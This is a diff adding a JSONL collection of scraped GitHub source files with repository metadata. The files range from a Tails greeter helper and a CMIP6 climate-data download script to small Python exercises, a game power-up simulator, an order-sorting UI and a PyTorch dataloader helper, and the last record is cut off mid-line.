diff --git "a/4567.jsonl" "b/4567.jsonl" new file mode 100644--- /dev/null +++ "b/4567.jsonl" @@ -0,0 +1,1515 @@ +{"seq_id":"74182821173","text":"#!/usr/bin/python3\n\nimport subprocess\nfrom pathlib import Path\n\nimport tailslib.shell\n\nbasedir = Path(\"/var/lib/live/config/\")\nvariable_to_file = {\n \"TAILS_NETWORK\": \"tails.network\",\n \"TAILS_MACSPOOF_ENABLED\": \"tails.macspoof\",\n \"TAILS_UNSAFE_BROWSER_ENABLED\": \"tails.unsafe-browser\",\n}\n\n\ndef _greeter_sh_wrapper(fname: str, variable: str) -> str:\n fpath = basedir / fname\n if not fpath.exists():\n raise ValueError(\"fname is not a valid filename\")\n shcmd = f\". '{fpath}' && echo ${variable}\"\n output = subprocess.check_output([\"/bin/sh\", \"-c\", shcmd], env={})\n return output.decode(\"ascii\")\n\n\ndef get_greeter_variable(variable: str) -> str:\n fname = variable_to_file[variable]\n return _greeter_sh_wrapper(fname, variable)\n\n\ndef get_greeter_variable_bool(variable: str) -> bool:\n v = get_greeter_variable(variable)\n return tailslib.shell.shell_value_to_bool(v)\n","repo_name":"austin987/tails","sub_path":"config/chroot_local-includes/usr/lib/python3/dist-packages/tailslib/greeter.py","file_name":"greeter.py","file_ext":"py","file_size_in_byte":903,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"39131478813","text":"from runpy import run_path as r\nfrom sys import exit as e\ntry:\n choice = input(\"Select an option:\\n 1 - Command-line version\\n 2 - Graphical version\\n>:\")\nexcept KeyboardInterrupt:\n print(\"\\rExited.\")\nexcept EOFError:\n print(\"Task failed successfully.\")\nif choice == \"1\":\n path = \"rockypaper.py\"\nelif choice == \"2\":\n path = \"rockypapergui.py\"\nelse:\n print(\"Defaulting to command-line edition.\")\n path = \"rockypaper.py\"\ntry:\n while True:\n r(path_name=path)\nexcept (KeyboardInterrupt, EOFError): #if ^C\n e(\"\\nSuccessfully exited rockyPaper.\")\nexcept Exception as ename: #any other error\n e(\"\\nAn unknown error occured (%s) :/\" % ename)\n","repo_name":"TheTechRobo/rocky-paper","sub_path":"rockypaperstartup.py","file_name":"rockypaperstartup.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17172161467","text":"import xarray as xr\nimport pooch\nimport pandas as pd\nimport fsspec\nfrom pathlib import Path\nimport json\nimport dask\nimport time\nimport numpy as np\n\ndask.config.set({\"array.slicing.split_large_chunks\": True})\n\n# get esm datastore\nodie = pooch.create(\n path=\"./.cache\", # create a cache to save the pangeo csv\n base_url=\"https://storage.googleapis.com/cmip6/\",\n # The registry specifies the files that can be fetched\n registry={\n \"pangeo-cmip6.csv\": \"3431e658603318a603e78d16be5e3fa636fc6817562d06ddbf67a976925afb9c\",\n },\n)\n\nfile_path = odie.fetch(\"pangeo-cmip6.csv\")\ndf_og = pd.read_csv(file_path) # the pangeo dataframe\n\n# this line is only necessary if caching the data. The data will cache under .cache/files\nfs = fsspec.filesystem(\n \"filecache\",\n target_protocol=\"gs\",\n target_options={\"anon\": True},\n cache_storage=\"./.cache/files/\",\n)\n\n\ndef get_pressure_field(mod_id, ds):\n if (\n (mod_id == \"CESM2\")\n | (mod_id == \"GISS-E2-1-H\")\n | (mod_id == \"MRI-ESM2-0\")\n | (mod_id == \"BCC-ESM1\")\n ):\n ds[\"p\"] = ds.a * ds.p0 + ds.b * ds.ps\n ds = ds.drop_vars([\"a\", \"p0\", \"b\", \"ps\"])\n elif mod_id == \"UKESM1-0-LL\":\n # the pressure field for this model has units of meters. I used the formula below to convert to Pa\n # barometric formula: https://link.springer.com/article/10.1007/s40828-020-0111-6\n p0 = 101325 # Pa\n rho0 = 1.225\n g = 9.81\n h = ds.lev + ds.b * ds.orog\n p = p0 * np.exp(-(rho0 * g * h) / p0)\n ds[\"p\"] = p.expand_dims({\"time\": ds.time}, axis=0)\n ds = ds.drop_vars([\"b\", \"orog\"])\n elif mod_id == \"CanESM5\":\n ds[\"p\"] = ds.ap + ds.b * ds.ps\n ds = ds.drop_vars([\"ap\", \"b\", \"ps\"])\n return ds\n\n\ndef save_model(var_id, mod_id, exp_id):\n # the experiments with the sftlf variable don't line up with the cl variable. sftlf is a fixed variable\n # so I just chose an experiment that has sftlf for all the models.\n lp_exp_id = \"piControl\"\n\n # the path where we will save the data\n model_path = Path(\"models/\" + var_id + \"/\" + mod_id + \"_\" + exp_id + \".zarr\")\n\n # get the data for the sftlf variable: percentage of the grid cell occupied by land\n query = (\n \"variable_id=='\"\n + lp_var_id\n + \"' & experiment_id=='\"\n + lp_exp_id\n + \"' & source_id=='\"\n + mod_id\n + \"' & table_id=='\"\n + lp_monthly_table\n + \"'\"\n )\n lp_df = df_og.query(query)\n zstore_url = lp_df[\"zstore\"].values[0]\n the_mapper = fs.get_mapper(zstore_url)\n # to not use caching, replace the above line with:\n # the_mapper=fsspec.get_mapper(zstore_url)\n lp_ds = xr.open_zarr(the_mapper, consolidated=True)\n\n # get the data for the cl variable: percentage cloud cover\n query = (\n \"variable_id=='\"\n + var_id\n + \"' & experiment_id=='\"\n + exp_id\n + \"' & source_id=='\"\n + mod_id\n + \"' & table_id=='\"\n + monthly_table\n + \"'\"\n )\n cloud_df = df_og.query(query)\n zstore_url = cloud_df[\"zstore\"].values[0]\n the_mapper = fs.get_mapper(zstore_url)\n # to not use caching, replace the above line with:\n # the_mapper=fsspec.get_mapper(zstore_url)\n ds = xr.open_zarr(the_mapper, consolidated=True)\n lp_ds = lp_ds.reindex_like(ds, method=\"nearest\")\n\n if len(ds.time) > 3000:\n ds = ds.isel(time=slice(0, 3000)) # 250 years max\n\n ds = ds.where(lp_ds.sftlf == 0.0) # only values over water\n ds = ds.sel(lat=slice(21, 47), lon=slice(200, 243)) # choose specific lats, lons\n\n ds = get_pressure_field(mod_id, ds)\n ds = ds.where(ds.p < 700000, drop=False) # values where the pressure is <700hPa\n\n ds.to_zarr(model_path, mode=\"w\")\n\n\n# sea area percentage parameters:\nlp_var_id = (\n \"sftlf\" # Percentage of the grid cell occupied by land (including lakes) [%]\n)\nlp_monthly_table = \"fx\" # fixed variables\n\n# model parameters:\nvar_id = \"cl\" # percentage cloud cover\nmonthly_table = \"Amon\" # monthly atmospheric data\n\n# read in the model csv to loop over all the models to save them.\nmodels_df = pd.read_csv(\"models.csv\")\n\nquery = \"variable_id=='\" + var_id + \"'\"\nmodels = models_df.query(query).drop_duplicates([\"source_id\"])[\"source_id\"]\n\nmodel_list = [\"CESM2\", \"UKESM1-0-LL\", \"CanESM5\"]\n\n# This loops over all the models in the dict and saves them. Usually there is not enough space to download all of the models if the data\n# is being cached. If it runs out of space, you can delete the file folder under .cache.\n\nfor mod_id in models:\n if mod_id in model_list:\n query = \"variable_id=='\" + var_id + \"' & source_id=='\" + mod_id + \"'\"\n exp_id_list = models_df.query(query)[\"experiment_id\"].values\n\n for i in range(len(exp_id_list)):\n t0 = time.time()\n print(\"model: \" + mod_id + \" exp: \" + exp_id_list[i])\n save_model(var_id, mod_id, exp_id_list[i])\n t1 = time.time()\n print(\"model time: \" + str(t1 - t0))\n","repo_name":"phaustin/addon_containers","sub_path":"cmip6_dashdir/save_data.py","file_name":"save_data.py","file_ext":"py","file_size_in_byte":5015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6507922778","text":"\"\"\"\nA python script to uppercase vowels in string using list indexing\n\n@usage python3 list_index.py \"I am an awesome programmer\"\n\"\"\"\n\n\ndef main():\n\n # user string input stored as list\n strings = list(input(\"Enter a string: \").lower())\n vowels = [\"a\", \"e\", \"i\", \"o\", \"u\"]\n\n # for loop to iterate through the characters in string\n for s in range(len(strings)):\n if (strings[s] in vowels):\n upper_char = strings[s].upper() # if matches uppercase the vowel\n strings[s] = upper_char # at that index change it to uppercase\n\n # iterate over the list and print it\n print(\"your final string with vowels uppercased is: \")\n for string in strings:\n print(string, end=\"\")\n\n print(\"\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jeethsoni/python_assignment_2","sub_path":"src/list_index.py","file_name":"list_index.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28230504076","text":"'''\nImplement a stack by two queues. The queue is first in first out (FIFO). That means you can not directly pop the last element in a queue.\n\nHave you met this question in a real interview? \nExample\npush(1)\npop()\npush(2)\nisEmpty() // return false\ntop() // return 2\npop()\nisEmpty() // return true\n'''\n\nfrom collections import deque\n\nclass Stack:\n def __init__(self):\n self.q1 = deque()\n self.q2 = deque()\n\n \"\"\"\n @param: x: An integer\n @return: nothing\n \"\"\"\n def push(self, x):\n # write your code here\n self.q1.append(x)\n\n \"\"\"\n @return: nothing\n \"\"\"\n def pop(self):\n # write your code here\n if self.isEmpty():\n raise Exception('pop from empty queue')\n while (len(self.q1) > 1):\n self.q2.append(self.q1.popleft())\n self.q1.popleft()\n self.q1, self.q2 = self.q2, self.q1\n\n \"\"\"\n @return: An integer\n \"\"\"\n def top(self):\n # write your code here\n if self.isEmpty():\n raise Exception('pop from empty queue')\n while (len(self.q1) > 1):\n self.q2.append(self.q1.popleft())\n res = self.q1.popleft()\n self.q2.append(res)\n self.q1, self.q2 = self.q2, self.q1\n return res\n \"\"\"\n @return: True if the stack is empty\n \"\"\"\n\n def isEmpty(self):\n # write your code here\n return len(self.q1) == 0\n\ns = Stack()\ns.push(1)\ns.pop()\ns.push(2)\nprint(s.isEmpty())\nprint(s.top())\ns.pop()\nprint(s.isEmpty())\n","repo_name":"zsmountain/lintcode","sub_path":"python/stack_queue_hash_heap/494_implement_stack_by_two_queues.py","file_name":"494_implement_stack_by_two_queues.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37363957825","text":"import sys\n\n#Python prpgram fo calculating Collatz chains.\n#Program defines a helper function as well as a Node and Chain object \n#Program will output intial value, max value and length of chain for each intial value from 1 until and user defined int\n#AUTHOR: davissmith1\n\n#helper funtion for determining if num is odd or even\n#returns True if odd, False if even\ndef isOdd(num):\n return num % 2 != 0\n\n#represents a node in the chain\nclass Node:\n def __init__(self, value, next):\n self.value = value\n self.next = next\n\n def getValue(self):\n return self.value\n\n def __str__(self):\n return str(self.value)\n\n#represents a chain of nodes\nclass Chain:\n def __init__(self, intialValue):\n self.initial = None\n self.current = None\n #total number of steps until value == 1\n self.size = 0\n #max value in chain\n self.maxValue = intialValue\n #creates node with intial value\n self.add(intialValue)\n self.createChain()\n\n #function to create chain\n def createChain(self):\n val = self.initial.value\n if val == 0:\n print('ERROR: value cannot be 0')\n \n while val != 1:\n if isOdd(val) :\n newVal = ((3*val) + 1)\n #updates maxVal is applicable\n if newVal > self.maxValue:\n self.maxValue = newVal\n #creates new node with calculated newVal\n self.add(newVal)\n \n else:\n newVal = val/2\n self.add(newVal)\n \n #iteates value to continue adding nodes\n val = self.current.value\n \n\n\n\n \n def add(self, value):\n if self.initial == None:\n self.initial = Node(value, None)\n self.current = self.initial\n else:\n self.current.next = Node(value, None)\n self.current = self.current.next\n self.size += 1\n\n def __str__(self):\n if self.initial == None:\n return \"Empty Chain\"\n chain = \"\"\n\n\ndef main(numChains):\n #list to hold all chains between 1 and user inputed value\n chains = []\n #creates chains\n for i in range(numChains):\n newChain = Chain(i+1)\n chains.append(newChain)\n for currentChain in chains:\n value = currentChain.initial.value\n maxValue = currentChain.maxValue\n size = currentChain.size\n #print(value+ \") max vale: \" + maxValue + \", chain length: \" + size, sep='/n')\n print(\"%d) Max Value: %d, Nodes to termination: %d\" % (value, maxValue, size))\n print(\"End of chains\")\n\nif __name__ == \"__main__\":\n #checks for correct number of arguments\n \n numberOfChains = 10\n\nmain(numberOfChains)\n \n","repo_name":"davissmith1/collatz","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5787465544","text":"#-*- coding: utf-8 -*-\n'''\nStoring the abstract syntax tree types here.\nThe developer is to add the type here to add a\ncode generation function for any new AST.\n\nPGMTYPE :\n'pgm'\n\nDECLTYPE :\n'decl'\n\nBVAL :\n'bval'\n\nNUMTYPE :\n'num'\n\nEXPTYPE :\n'exp'\n\nEVENTTYPE :\n\"evnt\"\n\nATOMICTYPE :\n'atmc'\n\nASGNTYPE :\n'asgn'\n\nCONDTYPE :\n'cond'\n\nITE :\n'ite'\n\nINIT:\n'init'\n\n.. module::asttypes\n :synopsis: abstract syntax tree type list\n.. moduleauthor:: Ritwika Ghosh \n'''\nLOCAL = 0\nALLWRITE = 1\nALLREAD = 2\n\nPGMTYPE = 'pgm'\nDECLTYPE = 'decl'\nBVAL = 'bval'\nNUMTYPE = 'num'\nEXPTYPE = 'exp'\nEVENTTYPE = \"evnt\"\nATOMICTYPE = 'atmc'\nASGNTYPE = 'asgn'\nCONDTYPE = 'cond'\nINITTYPE = 'init'\nITE = 'ite'\nARITHTYPE = 'arith'\nRESTYPE = 'res'\nVARTYPE = 'var'\nNULLTYPE = 'null'\nARTYPE = 'ar'\nAWTYPE = 'aw'","repo_name":"ritwika314/Koffee","sub_path":"asttypes.py","file_name":"asttypes.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36600683865","text":"from .db import db, environment, SCHEMA, add_prefix_for_prod\n\nwatchlist_stock = db.Table(\n 'watchlist_stock',\n db.Model.metadata,\n db.Column('watchlist_id', db.Integer, db.ForeignKey(\n add_prefix_for_prod('watchlists.id')), primary_key=True),\n db.Column('stocks_id', db.Integer, db.ForeignKey(\n add_prefix_for_prod('stocks.id')), primary_key=True)\n)\nif environment == 'production':\n watchlist_stock.schema = SCHEMA\n","repo_name":"NYDF/RobinWhod","sub_path":"app/models/watchlist_stock.py","file_name":"watchlist_stock.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25911694398","text":"#coding: utf8\nimport os\nimport yaml\nfrom collections import defaultdict\nfrom randoms import get_random_choice\nfrom http_helper import HttpHelper\nhh = HttpHelper()\n\nclass PowerUpProcessor(object):\n\n\tdef __init__(self, item_type, inputs, group_id):\n\t\tself.group_id = group_id\n\t\tself.item_type = item_type\n\t\tself.pdata = self.extract_power_up_data(item_type)\n\t\tself.get_error = False\n\t\tself.inputs = self.pdata[\"inputs\"]\n\t\tself.input_item = dict()\n\t\tself.output_item = dict()\n\t\tself.relative = self.pdata['relative']\n\t\tself.summary = self.pdata['summary']\n\t\tself.table = self.pdata['table']\n\t\tself.on_max_level = self.pdata['on_max_level']\n\t\tself.item_level = int(self.pdata.get(\"init_level\", 0))\n\t\t# 输入参数和需要参数数量不一致\n\t\tif len(inputs) != len(self.inputs):\n\t\t\tself.get_error = True\n\t\t\treturn\n\t\t# 把输入的数量存起来,判断是否超过上下限\n\t\tfor idx, ipt in enumerate(self.inputs):\n\t\t\titem_name = ipt.keys()[0]\n\t\t\titem_attrs = ipt.values()[0]\n\t\t\tif int(inputs[idx]) < item_attrs['lb'] or int(inputs[idx]) > item_attrs['ub']:\n\t\t\t\tself.get_error = True\n\t\t\t\treturn\n\t\t\tself.input_item[item_name] = int(inputs[idx])\n\n\tdef extract_power_up_data(self, ptype):\n\t\tori_path = r'E:\\workspace\\dn_robot\\power_ups' + '\\\\' + ptype + '.yml'\n\t\tif not os.path.isfile(ori_path):\n\t\t\treturn\n\t\tyml_data = yaml.load(open(ori_path))\n\t\treturn yml_data.get('data')\n\n\tdef upload_summary(self, item, diff_count):\n\t\t# 单个item的累加逻辑\n\n\t\titem_summary = self.summary.get(item)\n\t\t# 不需要计数的材料直接跳过\n\t\tif not item_summary:\n\t\t\treturn\n\t\tcount_type = item_summary[\"count_type\"]\n\t\t# 计数方式是累加,直接加\n\t\tif count_type == \"sum\":\n\t\t\tif not self.output_item.get(item):\n\t\t\t\tself.output_item[item] = 0\n\t\t\tself.output_item[item] += diff_count\n\t\tif count_type == \"max\":\n\t\t\tif not self.output_item.get(item):\n\t\t\t\tself.output_item[item] = 0\n\t\t\tself.output_item[item] = max(diff_count, self.output_item[item])\n\t\t# 计数方式是记分布\n\t\tif count_type == \"counter\":\n\t\t\tif not self.output_item.get(item):\n\t\t\t\tself.output_item[item] = defaultdict(int)\n\t\t\tdisplay_list = item_summary[\"display_list\"]\n\t\t\tif diff_count in display_list:\n\t\t\t\tself.output_item[item][diff_count] += 1\n\n\tdef apply_power_up_result(self, result):\n\t\t# 强化结果收集 消耗扣除 材料数累加 强化等级变化\n\n\t\tfor item, count in result.items():\n\t\t\t# 检查是否够强化费用\n\t\t\tif item in self.input_item:\n\t\t\t\tif self.input_item[item] + count < 0:\n\t\t\t\t\treturn False\n\t\t\t\tself.input_item[item] += count\n\t\tfor item, count in result.items():\n\t\t\t# 确认材料够\n\t\t\tif item in self.input_item:\n\t\t\t\tcontinue\n\t\t\t# 强化等级有变,可能归零\n\t\t\tif item == 'level':\n\t\t\t\tself.item_level += count\n\t\t\t\tself.item_level = max(0, self.item_level)\n\t\t\t\tself.upload_summary(\"level\", self.item_level)\n\t\t\t# 其他只可能是消耗型材料,直接上传结果\n\t\t\telse:\n\t\t\t\tself.upload_summary(item, count)\n\t\treturn True\n\n\tdef process_unable_power_up(self, init_msg=None):\n\t\t# 材料用尽时的结果通知\n\t\tmsg = [\n\t\t\tu\"强化完成,强化材料用尽,强化结果:\" if not init_msg else init_msg,\n\t\t]\n\t\t# 强化等级的分布\n\t\tfor k, v in self.summary.items():\n\t\t\tif v[\"count_type\"] == \"counter\":\n\t\t\t\toi = self.output_item.get(k)\n\t\t\t\tif not oi:\n\t\t\t\t\tmsg.append(u\"未强化到指定等级\")\n\t\t\t\telse:\n\t\t\t\t\tsub_msg = []\n\t\t\t\t\tfor level, count in sorted(oi.items()):\n\t\t\t\t\t\tsub_msg.append(u\"+%s:%s次\" % (level, count))\n\t\t\t\t\tmsg.append(u\";\".join(sub_msg))\n\t\t\tif v[\"count_type\"] == \"max\":\n\t\t\t\tmax_level = self.output_item.get(k)\n\t\t\t\tmsg.append(u\"强化至+%s\" % max_level)\n\t\t# 其他消耗材料的结果\n\t\tmsg.append(u\"消耗材料:\")\n\t\tfor k, v in self.summary.items():\n\t\t\tif v[\"count_type\"] == \"sum\":\n\t\t\t\tcount = self.output_item.get(k) or 0\n\t\t\t\tmsg.append(u\"%s:%s\" % (self.relative[k], count))\n\t\treturn hh.send_group_msg(self.group_id, u'\\n'.join(msg))\n\n\tdef send_error_message(self):\n\t\t# 提示错误输入\n\t\tmsg = [\n\t\t\tu\"输入格式:\"\n\t\t]\n\t\tformat = u\".ding %s\" % self.item_type\n\t\tfor ipt in self.inputs:\n\t\t\tipt_code = ipt.keys()[0]\n\t\t\tipt_config = ipt.values()[0]\n\t\t\tipt_name = self.relative[ipt_code]\n\t\t\tformat += u' %s数量(%s~%s)' % (ipt_name, ipt_config[\"lb\"], ipt_config[\"ub\"])\n\t\tmsg.append(format)\n\t\treturn hh.send_group_msg(self.group_id, u'\\n'.join(msg))\n\n\tdef process_max_level(self):\n\t\trests = []\n\t\tfor k, v in self.input_item.items():\n\t\t\trests.append(u\"%s: %s个\" % (self.relative[k], v))\n\t\tself.process_unable_power_up(\n\t\t\tinit_msg=u'强化完成,已到达最大等级,剩余材料:%s,强化结果:' % (\" \".join(rests))\n\t\t)\n\n\tdef process_power_up(self):\n\t\t# 进行一次强化\n\n\t\t# 已经不能再强化了\n\t\tlevel_table = self.table.get(self.item_level)\n\t\tif not level_table:\n\t\t\treturn self.process_max_level()\n\t\tsucc_ratio = level_table[\"succ_ratio\"]\n\t\tbroken_ratio = (1 - succ_ratio) * level_table.get(\"broken_ratio\", 0)\n\t\tfail_ratio = 1 - succ_ratio - broken_ratio\n\t\t# 得到强化结果\n\t\tpower_result = get_random_choice(\n\t\t\t[succ_ratio, fail_ratio, broken_ratio],\n\t\t\t[level_table[\"succ_result\"], level_table.get(\"fail_result\", dict()), level_table.get(\"broken_result\", dict())]\n\t\t)\n\t\t# 普通强化消耗\n\t\tif not self.apply_power_up_result(level_table[\"all_result\"]):\n\t\t\treturn self.process_unable_power_up()\n\t\t# 强化结果额外消耗\n\t\tself.apply_power_up_result(power_result)\n\t\treturn True\n\n\tdef run(self):\n\t\tif self.get_error:\n\t\t\treturn self.send_error_message()\n\t\twhile True:\n\t\t\tcan_continue = self.process_power_up()\n\t\t\tif not can_continue:\n\t\t\t\tbreak\n\nif __name__ == '__main__':\n\tp = PowerUpProcessor(u'顽强', [\"100\"], 655514756)\n\tp.run()","repo_name":"Morisummer135/m_dn_robot","sub_path":"power_up.py","file_name":"power_up.py","file_ext":"py","file_size_in_byte":5614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39702923676","text":"# /Users/Trevor/Documents/Scripts/batch-forge python\n# UI Script for Batch Forge\n\nimport json\nimport zipfile as zf\nfrom glob import glob\nfrom tkinter import *\nfrom tkinter import ttk\n\nfrom batch_sorting import *\nfrom wallpaper_sorter_functions import (\n checkForMultiQtySamplePdfs,\n cleanupDownloadDir,\n missing_pdf_list,\n damaged_pdf_list,\n split_pdf_list,\n parseJSON,\n reportListOfPdfs,\n sortPackagesByOrderNumber,\n sortPdfsToSortedFolders,\n splitMultiPagePDFs,\n ot_panel_unknown_list,\n)\nfrom batch_forge_config import GENERAL_VARS_HIDDEN as GVH\n\nDOWNLOAD_DIR = GVH[\"Caldera Dirs\"][\"Downloads\"]\n\n\nSORT_RESULTS = []\n\n\ndef get_sort_results() -> list:\n \"\"\"\n Accepts nothing. Returns a list containing the results of a sort function.\n \"\"\"\n result_msg_dict = {\n \"missing\": \"missing PDF. Moved to needs Attention.\",\n \"damaged\": \"damaged PDF. Moved to Needs Attention.\",\n \"illegible\": \"couldn't read OT panels. Moved to Needs Attention.\",\n \"split\": \"split into multiple files.\",\n }\n\n results_list = []\n results_list.extend(reportListOfPdfs(missing_pdf_list, result_msg_dict[\"missing\"]))\n results_list.extend(reportListOfPdfs(damaged_pdf_list, result_msg_dict[\"damaged\"]))\n results_list.extend(reportListOfPdfs(split_pdf_list, result_msg_dict[\"split\"]))\n results_list.extend(\n reportListOfPdfs(ot_panel_unknown_list, result_msg_dict[\"illegible\"])\n )\n return results_list\n\n\ndef sort_zipped_packages_window(root) -> None:\n \"\"\"\n Accepts nothing and returns nothing. Opens a window with a progress\n bar to monitor the unzipping and renaming of downloaded sort files.\n\n When done, cleans out the Downloads folder as well to keep things\n clean. If there are any results for the function, it will display\n them and wait for the user to close the window. Otherwise,\n automatically returns to the main menu.\n \"\"\"\n\n SORT_RESULTS = []\n\n # Initialize sort window\n window = Toplevel(root)\n window.title(\"Sort\")\n zippedPackages = sortPackagesByOrderNumber(glob(DOWNLOAD_DIR + \"*.zip\"))\n snort_label_count = len(zippedPackages)\n progress_frame = LabelFrame(window, text=\"Progress\", padx=10, pady=10, width=250)\n progress_frame.pack(padx=10, pady=10)\n\n # This is a fun easter egg for me, but is otherwise worthless.\n if snort_label_count == 67:\n snort_label = Label(\n progress_frame,\n text=f\"Now sorting {snort_label_count} orders.\\n\\n\"\n \"ALL HAIL SIXTY SEVEN\\nTHE 19TH AND HOLIEST PRIME\",\n )\n else:\n snort_label = Label(\n progress_frame, text=f\"Now sorting {snort_label_count} orders.\"\n )\n snort_label.pack(padx=10, pady=10)\n\n # Sets progress bar\n progress_bar = ttk.Progressbar(\n progress_frame, orient=\"horizontal\", length=200, mode=\"determinate\"\n )\n progress_bar.pack(pady=10, padx=20)\n\n # Sets status label\n status_label = Label(progress_frame, text=\"Working...\")\n status_label.pack()\n\n progress_bar[\"maximum\"] = snort_label_count\n\n # Begins unzipping, renaming, and sorting files\n for package in zippedPackages:\n status_label.config(text=package.split(\"/\")[-1])\n try:\n package_name = package.split(\"/\")[-1].split(\"_\")[0]\n unzip_dir = DOWNLOAD_DIR + (package_name) + \"/\"\n with zf.ZipFile(package, \"r\") as zip_ref:\n zip_ref.extractall(unzip_dir)\n except:\n unzip_error_label = Label(f\"| Couldn't unzip file: {package}\")\n unzip_error_label.pack(padx=5, pady=5)\n orderJSON = str(glob(unzip_dir + \"*.json\")).split(\"'\")[1]\n with open(orderJSON) as file:\n openJSON = json.load(file)\n parseJSON(openJSON, orderJSON, unzip_dir)\n splitMultiPagePDFs(glob(unzip_dir + \"*.pdf\"))\n checkForMultiQtySamplePdfs(glob(unzip_dir + \"*-Samp-*.pdf\"))\n try:\n sortPdfsToSortedFolders(glob(unzip_dir + \"*.pdf\"))\n except:\n SORT_RESULTS.append(f\"| Couldn't properly sort PDFs in {unzip_dir}\")\n\n progress_bar[\"value\"] += 1\n progress_frame.update_idletasks()\n\n # Updates label\n status_label.config(text=\"Done!\")\n snort_label.config(text=f\"Sorted {snort_label_count} orders.\")\n\n # Cleans out download directory of unneeded directories and folders\n cleanupDownloadDir(DOWNLOAD_DIR)\n\n # Displays sort results if any exist;\n # otherwise, closes window and returns to main menu\n SORT_RESULTS = get_sort_results()\n\n if len(SORT_RESULTS) == 0:\n window.destroy()\n else:\n results_frame = LabelFrame(window, text=\"Results\", padx=5, pady=3, width=350)\n results_frame.pack(padx=10, pady=10)\n\n for result in SORT_RESULTS:\n if \"Needs Attention\" in result:\n result_label = Label(results_frame, text=result, fg=\"red\")\n result_label.pack(anchor=\"w\", padx=1, pady=5)\n else:\n result_label = Label(results_frame, text=result)\n result_label.pack(anchor=\"w\", padx=1, pady=5)\n\n close_btn = Button(\n window,\n text=\"Return to Main Menu\",\n width=20,\n height=2,\n command=window.destroy,\n )\n close_btn.pack(padx=10, pady=10)\n","repo_name":"tnuckles/batch-forge","sub_path":"sorter_window.py","file_name":"sorter_window.py","file_ext":"py","file_size_in_byte":5326,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"1147064732","text":"text = input()\nelements = {}\nfor el in text:\n if not el in elements:\n elements[el] = 1\n else:\n elements[el] +=1\n\nfor key,value in sorted(elements.items(), key = lambda kvp: kvp[0]):\n print(f\"{key}: {value} time/s\")","repo_name":"a-angeliev/Python-Advanced-Softuni","sub_path":"Python-Advance/Exe. Tuples and Sets/4. Count Symbols.py","file_name":"4. Count Symbols.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37486861147","text":"def solution(record):\r\n result = []\r\n dict_id = {}\r\n msg_arr = []\r\n for i in record:\r\n result.append(i.split())\r\n \r\n for x in result:\r\n if len(x) == 3: # Enter와 Change의 경우 딕셔너리가 update 되야함\r\n dict_id[x[1]] = x[2]\r\n\r\n for x in result:\r\n if x[0] == \"Enter\":\r\n msg_arr.append(dict_id[x[1]]+\"님이 들어왔습니다.\")\r\n elif x[0] == \"Leave\":\r\n msg_arr.append(dict_id[x[1]]+\"님이 나갔습니다.\")\r\n \r\n return msg_arr\r\n\r\n\r\n","repo_name":"DrunkJin/CosMos","sub_path":"220704-220710/p42888/likelion-Jiyeong_p42888.py","file_name":"likelion-Jiyeong_p42888.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"39678030241","text":"from collections import deque\n\nF, S, G, U, D = map(int, input().split())\n\nneed_visited = deque([[S, 0]])\nvisited = set()\n\nans = -1\n\nwhile need_visited:\n cur, counter = need_visited.popleft()\n if not cur in visited:\n visited.add(cur)\n if cur == G:\n ans = counter\n break\n if cur + U <= F:\n need_visited.append([cur + U, counter + 1])\n\n if cur - D > 0:\n need_visited.append([cur - D, counter + 1])\n\nif ans == -1:\n print('use the stairs')\nelse:\n print(ans)\n","repo_name":"gmkseta/TIL","sub_path":"Algorithm/11week/5014.py","file_name":"5014.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22001496945","text":"\"\"\"\nContains functionality for creating PyTorch DataLoaders for custom image classification data.\n\"\"\"\nimport os\nfrom torchvision import datasets, transforms\nfrom torch.utils.data import DataLoader\n\nNUM_WORKERS = os.cpu_count()\n\ndef create_dataloaders(\n train_dir: str,\n test_dir: str,\n transform: transforms.Compose,\n batch_size: int,\n num_workers: int=NUM_WORKERS\n):\n \"\"\"\n Creates training and testing DataLoaders \n Takes in training and testing directory paths and turns their contents into PyTorch datasets, and then into PyTorch DataLoaders\n \n Parameters:\n train_dir: Path to the training directory\n test_dir: Path to the testing directory\n transform: A Torchvision transform to perform on the training and testing data\n batch_size: Sample size for the batches in the DataLoaders\n num_workers: Number of workers (CPU/GPU cores) per DataLoader\n \n Returns:\n A tuple of (train_dataloader, test_dataloader, class_names).\n Where class_names is a list of the target classes.\n \"\"\"\n # Create datasets with datasets.ImageFolder()\n train_data = datasets.ImageFolder(root=train_dir, transform=transform)\n test_data = datasets.ImageFolder(root=test_dir, transform=transform)\n \n # Get class names\n class_names = train_data.classes\n \n # Transform datasets into DataLoaders\n train_dataloader = DataLoader(dataset=train_data, batch_size=batch_size, num_workers=NUM_WORKERS, shuffle=True)\n test_dataloader = DataLoader(dataset=test_data, batch_size=batch_size, num_workers=NUM_WORKERS, shuffle=False)\n \n return train_dataloader, test_dataloader, 